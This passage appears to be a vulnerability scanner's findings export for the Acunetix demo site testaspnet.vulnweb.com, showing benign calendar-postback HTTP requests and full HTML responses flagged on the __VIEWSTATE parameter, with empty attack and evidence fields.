href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:White" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8491&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAZwlEMtsIZGRkqJOuZGvoB0lMUIMlW1%2FqjICFl1A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLOnZOcBwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcMymQq0zVu1bwSQZypwCTtvDh3kw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:47 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAZwlEMtsIZGRkqJOuZGvoB0lMUIMlW1/qjICFl1A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLOnZOcBwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcMymQq0zVu1bwSQZypwCTtvDh3kw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:White" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8490&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA%2Fd56MdsIZGRkR6HO4UlFC7B4YXC3vXogrGBqtC0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL0qv%2F7CALTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwejufo1%2FvkpwNlxX%2Fg4Mz2PRI7kRQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:54 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA/d56MdsIZGRkR6HO4UlFC7B4YXC3vXogrGBqtC0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL0qv/7CALTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwejufo1/vkpwNlxX/g4Mz2PRI7kRQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:White" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 